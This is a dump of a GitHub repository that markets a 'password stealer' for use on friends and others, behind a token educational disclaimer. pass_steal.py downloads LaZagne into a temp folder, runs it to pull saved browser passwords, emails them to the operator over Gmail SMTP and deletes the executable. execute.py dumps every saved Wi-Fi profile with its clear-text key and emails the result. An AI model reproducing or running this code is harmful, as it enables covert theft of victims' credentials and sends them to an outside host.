├── README.md ├── S_email.py ├── download.py ├── execute.py ├── pass_steal.py ├── sample.jpg └── sample.txt /README.md: -------------------------------------------------------------------------------- 1 | # Hey Guys...🤟 2 | 3 | ## 🚀 New launch -- Password Stealer script 4 | 5 | It is functioned by downloading the virus on the target machine or device, then the password will send the password to your mail, finally it will automatically delete itself. 6 | 7 | ## Disclaimer ⚠️ 8 | ⚠️ This is completely for Educational Purpose only. Don't use it for Serious illegal Activities 9 | 10 | If you caught 🫵, then we are not responsible...💀 11 | 12 | #### #---For Our Boys And Girls---# 13 | 14 | Maatikadhinga da...Ushar ah Play pannunga da Boys and girls...😂 15 | 16 | # FlyingCulprit_phishing 17 | Here is the tool for stealing your friends password from the browser which was saved on their browser, do it and have fun...😎 18 | 19 | 20 | ## Installation 21 | 22 | Install this on your linux 23 | 24 | ```bash 25 | $ sudo apt-get update 26 | $ sudo apt-get upgrade 27 | ``` 28 | ```bash 29 | $ sudo apt-get install git 30 | $ git clone https://github.com/flyingculprit/fc_phishing.git 31 | ``` 32 | 33 | Install this on your windows 34 | 35 | ```bash 36 | Go to vs code or python IDLE or pycharm 37 | ``` 38 | ```bash 39 | git clone https://github.com/flyingculprit/fc_script.git 40 | ``` 41 | ```bash 42 | Install the requirement which was imported 43 | 44 | Eg.: pip install Request 45 | pip install os 46 | ... 47 | 48 | ``` 49 | 50 | ## Deployment 51 | 52 | To deploy this in linux 53 | 54 | ```bash 55 | $ cd fc_script 56 | $ python fc_script.py 57 | ``` 58 | To deploy this on windows 59 | 60 | ```bash 61 | Run the file "pass_steal.py" 62 | 63 | ``` 64 | 65 | ```bash 66 | Press fn+f5 (according to your IDLE) 67 | 68 | Or 69 | 70 | python pass_steal.py (in cmd prmt) 71 | ``` 72 | ## Feedback 73 | 74 | If you have any feedback, please reach out to us at suryan2021ai@gmail.com 75 | 76 | 77 | ## Request 78 | 79 | Apdiye pakkathula iruka star ah thatti vidunga da Boyz and Girls....❤️✨ 80 | -------------------------------------------------------------------------------- /S_email.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | 3 | def send_email(sender_email, sender_password, receiver_email, subject, message): 4 | txt = f"Subject: {subject}\n\n{message}" 5 | 6 | server = smtplib.SMTP("smtp.gmail.com", 587) 7 | server.starttls() 8 | server.login(sender_email, sender_password) 9 | 10 | server.sendmail(sender_email, receiver_email, txt) 11 | #print("Email sent to " + receiver_email) 12 | 13 | # Example usage 14 | email = "example@gmail.com" 15 | password = "EMAIL_PASS" 16 | receivers_mail = "sample@gmail.com" 17 | subject = "Put your subject" 18 | command = "message" 19 | 20 | send_email(email, password, receivers_mail, subject, command) 21 | 22 | -------------------------------------------------------------------------------- /download.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | def download(url): 5 | get_responce = requests.get(url) 6 | file_name = url.split("/")[-1]#to split the words before / 7 | #print(file_name) 8 | with open("sample.jpg","wb") as out_file: 9 | out_file.write(get_responce.content) #file create and write th message 10 | download("https://wallpapercave.com/wp/wp2318912.jpg") -------------------------------------------------------------------------------- /execute.py: -------------------------------------------------------------------------------- 1 | import subprocess, smtplib, re 2 | 3 | def send_email(sender_email, sender_password, receiver_email, subject, message): 4 | txt = f"Subject: {subject}\n\n{message}".encode('utf-8') 5 | 6 | server = smtplib.SMTP("smtp.gmail.com", 587) 7 | server.starttls() 8 | server.login(sender_email, sender_password) 9 | 10 | server.sendmail(sender_email, receiver_email, txt) 11 | #print("Email sent to " + receiver_email) 12 | server.quit() 13 | 14 | # Example usage 15 | email = "example@gmail.com" 16 | password = "EMAIL_PASS" 17 | receivers_mail = "sample@gmail.com" 18 | subject = "Put your subject" 19 | 20 | 21 | command = "netsh wlan show profile" 22 | output = subprocess.check_output(command, shell =True).decode('utf-8') # decode to understandable form 23 | 24 | filter_result = re.findall("(?:Profile\\s*:\\s)(.*)", output) 25 | #print(filter_result) 26 | mail_output = "" 27 | for result in filter_result: 28 | command = "netsh wlan show profile \"" + result + "\" key=clear" 29 | profile_output = subprocess.check_output(command, shell=True) 30 | mail_output += profile_output.decode('utf-8', errors='replace') 31 | 32 | #print(mail_output) 33 | 34 | 35 | send_email(email, password, receivers_mail, subject, mail_output) -------------------------------------------------------------------------------- /pass_steal.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import subprocess 3 | import smtplib, os, tempfile 4 | 5 | def send_email(sender_email, sender_password, receiver_email, subject, message): 6 | txt = f"Subject: {subject}\n\n{message}".encode('utf-8') 7 | 8 | server = smtplib.SMTP("smtp.gmail.com", 587) 9 | server.starttls() 10 | server.login(sender_email, sender_password) 11 | 12 | server.sendmail(sender_email, receiver_email, txt) 13 | #print("Email sent to " + receiver_email) 14 | server.quit() 15 | # Example usage 16 | email = "example@gmail.com" 17 | password = "EMAIL_PASS" 18 | receivers_mail = "sample@gmail.com" 19 | subject = "Put your subject" 20 | 21 | 22 | def download(url): 23 | get_responce = requests.get(url) 24 | file_name = url.split("/")[-1]#to split the words before / 25 | #print(file_name) 26 | with open("file_name.exe","wb") as out_file: 27 | out_file.write(get_responce.content) #file create and write th message 28 | 29 | temp_dir = tempfile.gettempdir() 30 | os.chdir(temp_dir) 31 | download("https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe") 32 | result = subprocess.check_output('file_name.exe browsers -"chromium edge"', shell = True).decode('utf-8') 33 | send_email(email, password, receivers_mail, subject, result) 34 | os.remove("file_name.exe") -------------------------------------------------------------------------------- /sample.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flyingculprit/fc_script/e0c629607d93158a7791eeca18eb6799fdc2e748/sample.jpg -------------------------------------------------------------------------------- /sample.txt: -------------------------------------------------------------------------------- 1 | This the sample --------------------------------------------------------------------------------